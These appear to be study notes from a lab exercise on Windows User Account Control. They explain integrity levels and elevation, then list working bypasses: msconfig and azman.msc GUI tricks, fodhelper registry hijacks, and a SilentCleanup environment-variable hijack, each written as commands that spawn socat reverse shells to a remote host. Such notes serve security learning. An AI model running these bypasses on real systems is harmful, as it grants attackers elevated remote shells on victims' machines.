In the Open
In the Open

User Account Control

  • Change permissions of a process or its resources
  • Mandatory Integrity Control (MIC)
  • Feature of MAC, assigns integrity level on permissions
    • Low
    • Medium
    • High
    • System

Login Tokens

  • Access tokens are given to users at login
    • Non Administrator Token, integrity level low
    • Filtered Token, stripped administrative permission, integrity level medium
    • Elevated Token, elevates to integrity level high

User Account Control Settings

  • Always notify
  • Notify me only when programs try to make changes to my computer, shows UAC dialogue
  • Notify me only when programs try to make changes to my computer (do not dim my desktop)
  • Never notify, never show UAC dialogue

How UAC Works

Application Information Service, a.k.a Appinfo

  • User requests elevated permissions
  • ShellExecute API call is made via runas.exe
  • Request to Appinfo
  • Application manifest is checked if AutoElevation is set to on
  • Appinfo runs consent.exe, dialogue opens up
  • User clicks yes, token is checked. PPID of the newly created porcess will be pointed to the shell from which the request originates, while the login token is elevated. Otherwise it is denied

Bypass

  • UAC is seen as a convenience function, not a security function
  • Mandatory Label is shown via whoami /groups

GUI

msconfig

  • Open msconfig, always got integrity level high via auto elevation
  • On Tab Tools choose Command Prompt and press Launch to get an elevated cmd.exe

azman.msc

  • Open azman.msc --> Help --> Help Topics
  • Right click help article --> view source
  • Open --> File, select All Files
  • Dialogue opens up, go to C:\Windows\System32\cmd.exe and right click on it to open

Autoelevate Process

  • Binary must be signed

  • Must be in a trusted dir like Program Files or Windows

  • Additionaly, portable executables need autoelevate in the manifest. Check via

sigcheck64.exe -m <portable_executable.exe>
  • mmc.exe autoelevates depending on user request for msc-snapin
  • Most *.mscs, spinstall.exe, pkgmgr.exe as well as COM objects autoelevate

Commandline

Fodhelper.exe

  • Default applications are stored in HKEY_LOCAL_MACHINE\Software\Classes which is superseded by the current user profile HKEY_CURRENT_USER\Software\Classes
  • ms-settings ProgID is searched for by fodhelper.exe, this setting overrides system defaults of which executable opens the filetype

  • The subprocess of fodhelper.exe inherits intergrity level high

  • Open reverse shell on attacker and 

whoami
net user <user> | find "Local Group"
whoami /groups | find "Label"
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
  • Clean up via 
reg delete HKCU\Software\Classes\ms-settings\ /f

$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"

New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force

New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force

Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe

reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f

Scheduled Tasks

  • UAC will not be triggered on scheduled tasks
  • DiskCleanup calls %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
  • Set %windir% to a reverse shell via
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:$TARGET_IP:4711 EXEC:cmd.exe,pipes &REM " /f
schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
reg delete "HKCU\Environment" /v "windir" /f

Automated Bypass

Detection

  • https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/